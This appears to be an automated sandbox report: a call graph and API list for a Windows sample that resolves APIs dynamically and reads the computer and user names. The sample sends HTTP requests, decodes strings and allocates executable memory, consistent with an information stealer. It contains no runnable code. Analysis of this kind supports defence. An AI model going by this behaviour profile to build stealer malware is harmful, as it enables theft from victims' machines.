4045c0 34 API calls 26901->26902 26903 403479 26902->26903 26904 4045c0 34 API calls 26903->26904 26905 403492 26904->26905 26906 4045c0 34 API calls 26905->26906 26907 4034ab 26906->26907 26908 4045c0 34 API calls 26907->26908 26909 4034c4 26908->26909 26910 4045c0 34 API calls 26909->26910 26911 4034dd 26910->26911 26912 4045c0 34 API calls 26911->26912 26913 4034f6 26912->26913 26914 4045c0 34 API calls 26913->26914 26915 40350f 26914->26915 26916 4045c0 34 API calls 26915->26916 26917 403528 26916->26917 26918 4045c0 34 API calls 26917->26918 26919 403541 26918->26919 26920 4045c0 34 API calls 26919->26920 26921 40355a 26920->26921 26922 4045c0 34 API calls 26921->26922 26923 403573 26922->26923 26924 4045c0 34 API calls 26923->26924 26925 40358c 26924->26925 26926 4045c0 34 API calls 26925->26926 26927 4035a5 26926->26927 26928 4045c0 34 API calls 26927->26928 26929 4035be 26928->26929 26930 4045c0 34 API calls 26929->26930 26931 4035d7 26930->26931 26932 4045c0 34 API calls 26931->26932 26933 4035f0 26932->26933 26934 4045c0 34 API calls 26933->26934 26935 403609 26934->26935 26936 4045c0 34 API calls 26935->26936 26937 403622 26936->26937 26938 4045c0 34 API calls 26937->26938 26939 40363b 26938->26939 26940 4045c0 34 API calls 26939->26940 26941 403654 26940->26941 26942 4045c0 34 API calls 26941->26942 26943 40366d 26942->26943 26944 4045c0 34 API calls 26943->26944 26945 403686 26944->26945 26946 4045c0 34 API calls 26945->26946 26947 40369f 26946->26947 26948 4045c0 34 API calls 26947->26948 26949 4036b8 26948->26949 26950 4045c0 34 API calls 26949->26950 26951 4036d1 26950->26951 26952 4045c0 34 API calls 26951->26952 26953 4036ea 26952->26953 26954 4045c0 34 API calls 26953->26954 26955 403703 26954->26955 26956 4045c0 34 API calls 26955->26956 26957 40371c 26956->26957 26958 4045c0 34 API calls 26957->26958 26959 403735 26958->26959 26960 4045c0 34 API calls 26959->26960 26961 40374e 26960->26961 26962 4045c0 34 API calls 26961->26962 26963 403767 26962->26963 26964 4045c0 34 API calls 26963->26964 26965 403780 26964->26965 26966 4045c0 34 API calls 26965->26966 26967 403799 26966->26967 26968 4045c0 34 API calls 26967->26968 26969 4037b2 26968->26969 26970 4045c0 34 API calls 26969->26970 26971 4037cb 26970->26971 26972 4045c0 34 API calls 26971->26972 26973 4037e4 26972->26973 26974 4045c0 34 API calls 26973->26974 26975 4037fd 26974->26975 26976 4045c0 34 API calls 26975->26976 26977 403816 26976->26977 26978 4045c0 34 API calls 26977->26978 26979 40382f 26978->26979 26980 4045c0 34 API calls 26979->26980 26981 403848 26980->26981 26982 4045c0 34 API calls 26981->26982 26983 403861 26982->26983 26984 4045c0 34 API calls 26983->26984 26985 40387a 26984->26985 26986 4045c0 34 API calls 26985->26986 26987 403893 26986->26987 26988 4045c0 34 API calls 26987->26988 26989 4038ac 26988->26989 26990 4045c0 34 API calls 26989->26990 26991 4038c5 26990->26991 26992 4045c0 34 API calls 26991->26992 26993 4038de 26992->26993 26994 4045c0 34 API calls 26993->26994 26995 4038f7 26994->26995 26996 4045c0 34 API calls 26995->26996 26997 403910 26996->26997 26998 4045c0 34 API calls 26997->26998 26999 403929 26998->26999 27000 4045c0 34 API calls 26999->27000 27001 403942 27000->27001 27002 4045c0 34 API calls 27001->27002 27003 40395b 27002->27003 27004 4045c0 34 API calls 27003->27004 27005 403974 27004->27005 27006 4045c0 34 API calls 27005->27006 27007 40398d 27006->27007 27008 4045c0 34 API calls 27007->27008 27009 4039a6 27008->27009 27010 4045c0 34 API calls 27009->27010 27011 4039bf 27010->27011 27012 4045c0 34 API calls 27011->27012 27013 4039d8 27012->27013 27014 4045c0 34 API calls 27013->27014 27015 4039f1 27014->27015 27016 4045c0 34 API calls 27015->27016 27017 403a0a 27016->27017 27018 4045c0 34 API calls 27017->27018 27019 403a23 27018->27019 27020 4045c0 34 API calls 27019->27020 27021 403a3c 27020->27021 27022 4045c0 34 API calls 27021->27022 27023 403a55 27022->27023 27024 4045c0 34 API calls 27023->27024 27025 403a6e 27024->27025 27026 4045c0 34 API calls 27025->27026 27027 403a87 27026->27027 27028 4045c0 34 API calls 27027->27028 27029 403aa0 27028->27029 27030 4045c0 34 API calls 27029->27030 27031 403ab9 27030->27031 27032 4045c0 34 API calls 27031->27032 27033 403ad2 27032->27033 27034 4045c0 34 API calls 27033->27034 27035 403aeb 27034->27035 27036 4045c0 34 API calls 27035->27036 27037 403b04 27036->27037 27038 4045c0 34 API calls 27037->27038 27039 403b1d 27038->27039 27040 4045c0 34 API calls 27039->27040 27041 403b36 27040->27041 27042 4045c0 34 API calls 27041->27042 27043 403b4f 27042->27043 27044 4045c0 34 API calls 27043->27044 27045 403b68 27044->27045 27046 4045c0 34 API calls 27045->27046 27047 403b81 27046->27047 27048 4045c0 34 API calls 27047->27048 27049 403b9a 27048->27049 27050 4045c0 34 API calls 27049->27050 27051 403bb3 27050->27051 27052 4045c0 34 API calls 27051->27052 27053 403bcc 27052->27053 27054 4045c0 34 API calls 27053->27054 27055 403be5 27054->27055 27056 4045c0 34 API calls 27055->27056 27057 403bfe 27056->27057 27058 4045c0 34 API calls 27057->27058 27059 403c17 27058->27059 27060 4045c0 34 API calls 27059->27060 27061 403c30 27060->27061 27062 4045c0 34 API calls 27061->27062 27063 403c49 27062->27063 27064 4045c0 34 API calls 27063->27064 27065 403c62 27064->27065 27066 4045c0 34 API calls 27065->27066 27067 403c7b 27066->27067 27068 4045c0 34 API calls 27067->27068 27069 403c94 27068->27069 27070 4045c0 34 API calls 27069->27070 27071 403cad 27070->27071 27072 4045c0 34 API calls 27071->27072 27073 403cc6 27072->27073 27074 4045c0 34 API calls 27073->27074 27075 403cdf 27074->27075 27076 4045c0 34 API calls 27075->27076 27077 403cf8 27076->27077 27078 4045c0 34 API calls 27077->27078 27079 403d11 27078->27079 27080 4045c0 34 API calls 27079->27080 27081 403d2a 27080->27081 27082 4045c0 34 API calls 27081->27082 27083 403d43 27082->27083 27084 4045c0 34 API calls 27083->27084 27085 403d5c 27084->27085 27086 4045c0 34 API calls 27085->27086 27087 403d75 27086->27087 27088 4045c0 34 API calls 27087->27088 27089 403d8e 27088->27089 27090 4045c0 34 API calls 27089->27090 27091 403da7 27090->27091 27092 4045c0 34 API calls 27091->27092 27093 403dc0 27092->27093 27094 4045c0 34 API calls 27093->27094 27095 403dd9 27094->27095 27096 4045c0 34 API calls 27095->27096 27097 403df2 27096->27097 27098 4045c0 34 API calls 27097->27098 27099 403e0b 27098->27099 27100 4045c0 34 API calls 27099->27100 27101 403e24 27100->27101 27102 4045c0 34 API calls 27101->27102 27103 403e3d 27102->27103 27104 4045c0 34 API calls 27103->27104 27105 403e56 27104->27105 27106 4045c0 34 API calls 27105->27106 27107 403e6f 27106->27107 27108 4045c0 34 API calls 27107->27108 27109 403e88 27108->27109 27110 4045c0 34 API calls 27109->27110 27111 403ea1 27110->27111 27112 4045c0 34 API calls 27111->27112 27113 403eba 27112->27113 27114 4045c0 34 API calls 27113->27114 27115 403ed3 27114->27115 27116 4045c0 34 API calls 27115->27116 27117 403eec 27116->27117 27118 4045c0 34 API calls 27117->27118 27119 403f05 27118->27119 27120 4045c0 34 API calls 27119->27120 27121 403f1e 27120->27121 27122 4045c0 34 API calls 27121->27122 27123 403f37 27122->27123 27124 4045c0 34 API calls 27123->27124 27125 403f50 27124->27125 27126 4045c0 34 API calls 27125->27126 27127 403f69 27126->27127 27128 4045c0 34 API calls 27127->27128 27129 403f82 27128->27129 27130 4045c0 34 API calls 27129->27130 27131 403f9b 27130->27131 27132 4045c0 34 API calls 27131->27132 27133 403fb4 27132->27133 27134 4045c0 34 API calls 27133->27134 27135 403fcd 27134->27135 27136 4045c0 34 API calls 27135->27136 27137 403fe6 27136->27137 27138 4045c0 34 API calls 27137->27138 27139 403fff 27138->27139 27140 4045c0 34 API calls 27139->27140 27141 404018 27140->27141 27142 4045c0 34 API calls 27141->27142 27143 404031 27142->27143 27144 4045c0 34 API calls 27143->27144 27145 40404a 27144->27145 27146 4045c0 34 API calls 27145->27146 27147 404063 27146->27147 27148 4045c0 34 API calls 27147->27148 27149 40407c 27148->27149 27150 4045c0 34 API calls 27149->27150 27151 404095 27150->27151 27152 4045c0 34 API calls 27151->27152 27153 4040ae 27152->27153 27154 4045c0 34 API calls 27153->27154 27155 4040c7 27154->27155 27156 4045c0 34 API calls 27155->27156 27157 4040e0 27156->27157 27158 4045c0 34 API calls 27157->27158 27159 4040f9 27158->27159 27160 4045c0 34 API calls 27159->27160 27161 404112 27160->27161 27162 4045c0 34 API calls 27161->27162 27163 40412b 27162->27163 27164 4045c0 34 API calls 27163->27164 27165 404144 27164->27165 27166 4045c0 34 API calls 27165->27166 27167 40415d 27166->27167 27168 4045c0 34 API calls 27167->27168 27169 404176 27168->27169 27170 4045c0 34 API calls 27169->27170 27171 40418f 27170->27171 27172 4045c0 34 API calls 27171->27172 27173 4041a8 27172->27173 27174 4045c0 34 API calls 27173->27174 27175 4041c1 27174->27175 27176 4045c0 34 API calls 27175->27176 27177 4041da 27176->27177 27178 4045c0 34 API calls 27177->27178 27179 4041f3 27178->27179 27180 4045c0 34 API calls 27179->27180 27181 40420c 27180->27181 27182 4045c0 34 API calls 27181->27182 27183 404225 27182->27183 27184 4045c0 34 API calls 27183->27184 27185 40423e 27184->27185 27186 4045c0 34 API calls 27185->27186 27187 404257 27186->27187 27188 4045c0 34 API calls 27187->27188 27189 404270 27188->27189 27190 4045c0 34 API calls 27189->27190 27191 404289 27190->27191 27192 4045c0 34 API calls 27191->27192 27193 4042a2 27192->27193 27194 4045c0 34 API calls 27193->27194 27195 4042bb 27194->27195 27196 4045c0 34 API calls 27195->27196 27197 4042d4 27196->27197 27198 4045c0 34 API calls 27197->27198 27199 4042ed 27198->27199 27200 4045c0 34 API calls 27199->27200 27201 404306 27200->27201 27202 4045c0 34 API calls 27201->27202 27203 40431f 27202->27203 27204 4045c0 34 API calls 27203->27204 27205 404338 27204->27205 27206 4045c0 34 API calls 27205->27206 27207 404351 27206->27207 27208 4045c0 34 API calls 27207->27208 27209 40436a 27208->27209 27210 4045c0 34 API calls 27209->27210 27211 404383 27210->27211 27212 4045c0 34 API calls 27211->27212 27213 40439c 27212->27213 27214 4045c0 34 API calls 27213->27214 27215 4043b5 27214->27215 27216 4045c0 34 API calls 27215->27216 27217 4043ce 27216->27217 27218 4045c0 34 API calls 27217->27218 27219 4043e7 27218->27219 27220 4045c0 34 API calls 27219->27220 27221 404400 27220->27221 27222 4045c0 34 API calls 27221->27222 27223 404419 27222->27223 27224 4045c0 34 API calls 27223->27224 27225 404432 27224->27225 27226 4045c0 34 API calls 27225->27226 27227 40444b 27226->27227 27228 4045c0 34 API calls 27227->27228 27229 404464 27228->27229 27230 4045c0 34 API calls 27229->27230 27231 40447d 27230->27231 27232 4045c0 34 API calls 27231->27232 27233 404496 27232->27233 27234 4045c0 34 API calls 27233->27234 27235 4044af 27234->27235 27236 4045c0 34 API calls 27235->27236 27237 4044c8 27236->27237 27238 4045c0 34 API calls 27237->27238 27239 4044e1 27238->27239 27240 4045c0 34 API calls 27239->27240 27241 4044fa 27240->27241 27242 4045c0 34 API calls 27241->27242 27243 404513 27242->27243 27244 4045c0 34 API calls 27243->27244 27245 40452c 27244->27245 27246 4045c0 34 API calls 27245->27246 27247 404545 27246->27247 27248 4045c0 34 API calls 27247->27248 27249 40455e 27248->27249 27250 4045c0 34 API calls 27249->27250 27251 404577 27250->27251 27252 4045c0 34 API calls 27251->27252 27253 404590 27252->27253 27254 4045c0 34 API calls 27253->27254 27255 4045a9 27254->27255 27256 419c10 27255->27256 27257 419c20 43 API calls 27256->27257 27258 41a036 8 API calls 27256->27258 27257->27258 27259 41a146 27258->27259 27260 41a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27258->27260 27261 41a153 8 API calls 27259->27261 27262 41a216 27259->27262 27260->27259 27261->27262 27263 41a298 27262->27263 27264 41a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27262->27264 27265 41a2a5 6 API calls 27263->27265 27266 41a337 27263->27266 27264->27263 27265->27266 27267 41a344 9 API calls 27266->27267 27268 41a41f 27266->27268 27267->27268 27269 41a4a2 27268->27269 27270 41a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27268->27270 27271 41a4ab GetProcAddress GetProcAddress 27269->27271 27272 41a4dc 27269->27272 27270->27269 27271->27272 27273 41a515 27272->27273 27274 41a4e5 GetProcAddress GetProcAddress 27272->27274 27275 41a612 27273->27275 27276 41a522 10 API calls 27273->27276 27274->27273 27277 41a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27275->27277 27278 41a67d 27275->27278 27276->27275 27277->27278 27279 41a686 GetProcAddress 27278->27279 27280 41a69e 27278->27280 27279->27280 27281 41a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27280->27281 27282 415ca3 27280->27282 27281->27282 27283 401590 27282->27283 27558 401670 27283->27558 27286 41a7a0 lstrcpy 27287 4015b5 27286->27287 27288 41a7a0 lstrcpy 27287->27288 27289 4015c7 27288->27289 27290 41a7a0 lstrcpy 27289->27290 27291 4015d9 27290->27291 27292 41a7a0 lstrcpy 27291->27292 27293 401663 27292->27293 27294 415510 27293->27294 27295 415521 27294->27295 27296 41a820 2 API calls 27295->27296 27297 41552e 27296->27297 27298 41a820 2 API calls 27297->27298 27299 41553b 27298->27299 27300 41a820 2 API calls 27299->27300 27301 415548 27300->27301 27302 41a740 lstrcpy 27301->27302 27303 415555 27302->27303 27304 41a740 lstrcpy 27303->27304 27305 415562 27304->27305 27306 41a740 lstrcpy 27305->27306 27307 41556f 27306->27307 27308 41a740 lstrcpy 27307->27308 27348 41557c 27308->27348 27309 415643 StrCmpCA 27309->27348 27310 4156a0 StrCmpCA 27311 4157dc 27310->27311 27310->27348 27312 41a8a0 lstrcpy 27311->27312 27313 4157e8 27312->27313 27314 41a820 2 API calls 27313->27314 27316 4157f6 27314->27316 27315 41a820 lstrlenA lstrcpy 27315->27348 27318 41a820 2 API calls 27316->27318 27317 415856 StrCmpCA 27319 415991 27317->27319 27317->27348 27323 415805 27318->27323 27322 41a8a0 lstrcpy 27319->27322 27320 41a740 lstrcpy 27320->27348 27321 41a7a0 lstrcpy 27321->27348 27324 41599d 27322->27324 27325 401670 lstrcpy 27323->27325 27327 41a820 2 API calls 27324->27327 27346 415811 27325->27346 27326 401590 lstrcpy 27326->27348 27328 4159ab 27327->27328 27331 41a820 2 API calls 27328->27331 27329 415a0b StrCmpCA 27332 415a16 Sleep 27329->27332 27333 415a28 27329->27333 27330 4151f0 23 API calls 27330->27348 27334 4159ba 27331->27334 27332->27348 27335 41a8a0 lstrcpy 27333->27335 27336 401670 lstrcpy 27334->27336 27337 415a34 27335->27337 27336->27346 27338 41a820 2 API calls 27337->27338 27339 415a43 27338->27339 27341 41a820 2 API calls 27339->27341 27340 4152c0 29 API calls 27340->27348 27343 415a52 27341->27343 27342 41578a StrCmpCA 27342->27348 27345 401670 lstrcpy 27343->27345 27344 41a8a0 lstrcpy 27344->27348 27345->27346 27346->26402 27347 41593f StrCmpCA 27347->27348 27348->27309 27348->27310 27348->27315 27348->27317 27348->27320 27348->27321 27348->27326 27348->27329 27348->27330 27348->27340 27348->27342 27348->27344 27348->27347 27350 417553 GetVolumeInformationA 27349->27350 27351 41754c 27349->27351 27352 417591 27350->27352 27351->27350 27353 4175fc GetProcessHeap HeapAlloc 27352->27353 27354 417619 27353->27354 27355 417628 wsprintfA 27353->27355 27356 41a740 lstrcpy 27354->27356 27357 41a740 lstrcpy 27355->27357 27358 415da7 27356->27358 27357->27358 27358->26423 27360 41a7a0 lstrcpy 27359->27360 27361 404899 27360->27361 27567 4047b0 27361->27567 27363 4048a5 27364 41a740 lstrcpy 27363->27364 27365 4048d7 27364->27365 27366 41a740 lstrcpy 27365->27366 27367 4048e4 27366->27367 27368 41a740 lstrcpy 27367->27368 27369 4048f1 27368->27369 27370 41a740 lstrcpy 27369->27370 27371 4048fe 27370->27371 27372 41a740 lstrcpy 27371->27372 27373 40490b InternetOpenA StrCmpCA 27372->27373 27374 404944 27373->27374 27375 404955 27374->27375 27376 404ecb InternetCloseHandle 27374->27376 27580 418b60 GetSystemTime lstrcpy lstrcpy 27375->27580 27377 404ee8 27376->27377 27575 409ac0 CryptStringToBinaryA 27377->27575 27379 404963 27581 41a920 lstrcpy lstrcpy lstrcatA 27379->27581 27382 404976 27384 41a8a0 lstrcpy 27382->27384 27389 40497f 27384->27389 27385 41a820 2 API calls 27386 404f05 27385->27386 27388 41a9b0 4 API calls 27386->27388 27387 404f27 codecvt 27391 41a7a0 lstrcpy 27387->27391 27390 404f1b 27388->27390 27393 41a9b0 4 API calls 27389->27393 27392 41a8a0 lstrcpy 27390->27392 27404 404f57 27391->27404 27392->27387 27394 4049a9 27393->27394 27395 41a8a0 lstrcpy 27394->27395 27396 4049b2 27395->27396 27397 41a9b0 4 API calls 27396->27397 27398 4049d1 27397->27398 27399 41a8a0 lstrcpy 27398->27399 27400 4049da 27399->27400 27582 41a920 lstrcpy lstrcpy lstrcatA 27400->27582 27402 4049f8 27403 41a8a0 lstrcpy 27402->27403 27405 404a01 27403->27405 27404->26426 27406 41a9b0 4 API calls 27405->27406 27407 404a20 27406->27407 27408 41a8a0 lstrcpy 27407->27408 27409 404a29 27408->27409 27410 41a9b0 4 API calls 27409->27410 27411 404a48 27410->27411 27412 41a8a0 lstrcpy 27411->27412 27413 404a51 27412->27413 27414 41a9b0 4 API calls 27413->27414 27415 404a7d 27414->27415 27583 41a920 lstrcpy lstrcpy lstrcatA 27415->27583 27417 404a84 27418 41a8a0 lstrcpy 27417->27418 27419 404a8d 27418->27419 27420 404aa3 InternetConnectA 27419->27420 27420->27376 27421 404ad3 HttpOpenRequestA 27420->27421 27423 404b28 27421->27423 27424 404ebe InternetCloseHandle 27421->27424 27425 41a9b0 4 API calls 27423->27425 27424->27376 27426 404b3c 27425->27426 27427 41a8a0 lstrcpy 27426->27427 27428 404b45 27427->27428 27584 41a920 lstrcpy lstrcpy lstrcatA 27428->27584 27430 404b63 27431 41a8a0 lstrcpy 27430->27431 27432 404b6c 27431->27432 27433 41a9b0 4 API calls 27432->27433 27434 404b8b 27433->27434 27435 41a8a0 lstrcpy 27434->27435 27436 404b94 27435->27436 27437 41a9b0 4 API calls 27436->27437 27438 404bb5 27437->27438 27439 41a8a0 lstrcpy 27438->27439 27440 404bbe 27439->27440 27441 41a9b0 4 API calls 27440->27441 27442 404bde 27441->27442 27443 41a8a0 lstrcpy 27442->27443 27444 404be7 27443->27444 27445 41a9b0 4 API calls 27444->27445 27446 404c06 27445->27446 27447 41a8a0 lstrcpy 27446->27447 27448 404c0f 27447->27448 27585 41a920 lstrcpy lstrcpy lstrcatA 27448->27585 27450 404c2d 27451 41a8a0 lstrcpy 27450->27451 27452 404c36 27451->27452 27453 41a9b0 4 API calls 27452->27453 27454 404c55 27453->27454 27455 41a8a0 lstrcpy 27454->27455 27456 404c5e 27455->27456 27457 41a9b0 4 API calls 27456->27457 27458 404c7d 27457->27458 27459 41a8a0 lstrcpy 27458->27459 27460 404c86 27459->27460 27586 41a920 lstrcpy lstrcpy lstrcatA 27460->27586 27462 404ca4 27463 41a8a0 lstrcpy 27462->27463 27464 404cad 27463->27464 27465 41a9b0 4 API calls 27464->27465 27466 404ccc 27465->27466 27467 41a8a0 lstrcpy 27466->27467 27468 404cd5 27467->27468 27469 41a9b0 4 API calls 27468->27469 27470 404cf6 27469->27470 27471 41a8a0 lstrcpy 27470->27471 27472 404cff 27471->27472 27473 41a9b0 4 API calls 27472->27473 27474 404d1f 27473->27474 27475 41a8a0 lstrcpy 27474->27475 27476 404d28 27475->27476 27477 41a9b0 4 API calls 27476->27477 27478 404d47 27477->27478 27479 41a8a0 lstrcpy 27478->27479 27480 404d50 27479->27480 27587 41a920 lstrcpy lstrcpy lstrcatA 27480->27587 27482 404d6e 27483 41a8a0 lstrcpy 27482->27483 27484 404d77 27483->27484 27485 41a740 lstrcpy 27484->27485 27486 404d92 27485->27486 27588 41a920 lstrcpy lstrcpy lstrcatA 27486->27588 27488 404db3 27589 41a920 lstrcpy lstrcpy lstrcatA 27488->27589 27490 404dba 27491 41a8a0 lstrcpy 27490->27491 27492 404dc6 27491->27492 27493 404de7 lstrlenA 27492->27493 27494 404dfa 27493->27494 27495 404e03 lstrlenA 27494->27495 27590 41aad0 27495->27590 27497 404e13 HttpSendRequestA 27498 404e32 InternetReadFile 27497->27498 27499 404e67 InternetCloseHandle 27498->27499 27504 404e5e 27498->27504 27502 41a800 27499->27502 27501 41a9b0 4 API calls 27501->27504 27502->27424 27503 41a8a0 lstrcpy 27503->27504 27504->27498 27504->27499 27504->27501 27504->27503 27595 41aad0 27505->27595 27507 4117c4 StrCmpCA 27508 4117d7 27507->27508 27509 4117cf ExitProcess 27507->27509 27510 4117e7 strtok_s 27508->27510 27524 4117f4 27510->27524 27511 4119c2 27511->26428 27512 41199e strtok_s 27512->27524 27513 4118ad StrCmpCA 27513->27524 27514 4118cf StrCmpCA 27514->27524 27515 4118f1 StrCmpCA 27515->27524 27516 411951 StrCmpCA 27516->27524 27517 411970 StrCmpCA 27517->27524 27518 411913 StrCmpCA 27518->27524 27519 411932 StrCmpCA 27519->27524 27520 41185d StrCmpCA 27520->27524 27521 41187f StrCmpCA 27521->27524 27522 41a820 lstrlenA lstrcpy 27522->27524 27523 41a820 2 API calls 27523->27512 27524->27511 27524->27512 27524->27513 27524->27514 27524->27515 27524->27516 27524->27517 27524->27518 27524->27519 27524->27520 27524->27521 27524->27522 27524->27523 27525->26434 27526->26436 27527->26442 27528->26444 27529->26450 27530->26452 27531->26456 27532->26460 27533->26464 27534->26470 27535->26472 27536->26476 27537->26490 27538->26494 27539->26493 27540->26489 27541->26493 27542->26506 27543->26531 27544->26509 27545->26517 27546->26526 27547->26510 27548->26511 27549->26519 27550->26521 27551->26547 27552->26550 27553->26551 27554->26546 27555->26551 27556->26560 27559 41a7a0 lstrcpy 27558->27559 27560 401683 27559->27560 27561 41a7a0 lstrcpy 27560->27561 27562 401695 27561->27562 27563 41a7a0 lstrcpy 27562->27563 27564 4016a7 27563->27564 27565 41a7a0 lstrcpy 27564->27565 27566 4015a3 27565->27566 27566->27286 27591 401030 27567->27591 27571 404838 lstrlenA 27594 41aad0 27571->27594 27573 404848 InternetCrackUrlA 27574 404867 27573->27574 27574->27363 27576 409af9 LocalAlloc 27575->27576 27577 404eee 27575->27577 27576->27577 27578 409b14 CryptStringToBinaryA 27576->27578 27577->27385 27577->27387 27578->27577 27579 409b39 LocalFree 27578->27579 27579->27577 27580->27379 27581->27382 27582->27402 27583->27417 27584->27430 27585->27450 27586->27462 27587->27482 27588->27488 27589->27490 27590->27497 27592 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 27591->27592 27593 41aad0 27592->27593 27593->27571 27594->27573 27595->27507 27731 416ab1 902 API calls 27694 4069f3 7 API calls 27596 83b436 27597 83b445 27596->27597 27600 83bbd6 27597->27600 27601 83bbf1 27600->27601 27602 83bbfa CreateToolhelp32Snapshot 27601->27602 27603 83bc16 Module32First 27601->27603 27602->27601 27602->27603 27604 83bc25 27603->27604 27606 83b44e 27603->27606 27607 83b895 27604->27607 27608 83b8c0 27607->27608 27609 83b8d1 VirtualAlloc 27608->27609 27610 83b909 27608->27610 27609->27610 27610->27610 27695 b3d106 41 API calls __amsg_exit 27611 b20005 27616 b2092b GetPEB 27611->27616 27613 b20030 27617 b2003c 27613->27617 27616->27613 27618 b20049 27617->27618 27630 b20e0f SetErrorMode SetErrorMode 27618->27630 27623 b20265 27624 b202ce VirtualProtect 27623->27624 27626 b2030b 27624->27626 27625 b20439 VirtualFree 27629 b204be LoadLibraryA 27625->27629 27626->27625 27628 b208c7 27629->27628 27631 b20223 27630->27631 27632 b20d90 27631->27632 27633 b20dad 27632->27633 27634 b20dbb GetPEB 27633->27634 27635 b20238 VirtualAlloc 27633->27635 27634->27635 27635->27623 27733 b36a0a ExitProcess 27734 41cafe 219 API calls 5 library calls 27735 b3cd97 170 API calls 2 library calls 27736 b3be78 162 API calls 2 library calls 26167 401190 26174 4178e0 GetProcessHeap HeapAlloc GetComputerNameA 26167->26174 26169 40119e 26170 4011cc 26169->26170 26176 417850 GetProcessHeap HeapAlloc GetUserNameA 26169->26176 26172 4011b7 26172->26170 26173 4011c4 ExitProcess 26172->26173 26175 417939 26174->26175 26175->26169 26177 4178c3 26176->26177 26177->26172 27669 b33823 StrCmpCA StrCmpCA StrCmpCA StrCmpCA strtok_s 27699 b2fd67 152 API calls 27737 41ce9f 69 API calls __amsg_exit 27670 b3140b strtok_s 27671 b33823 6 API calls 27672 4088a4 RaiseException task __CxxThrowException@8 27673 4180a5 GetProcessHeap HeapFree 27674 b36c57 692 API calls 27702 b36d18 646 API calls 27675 b3102b StrCmpCA strtok_s lstrlen lstrcpy 27704 41b9b0 RtlUnwind 27739 b33b7d 91 API calls 2 library calls 27740 b36a40 6 API calls

                                                  Control-flow Graph

                                                  APIs
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
                                                  • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
                                                  • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
                                                  • strlen.MSVCRT ref: 004046F0
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
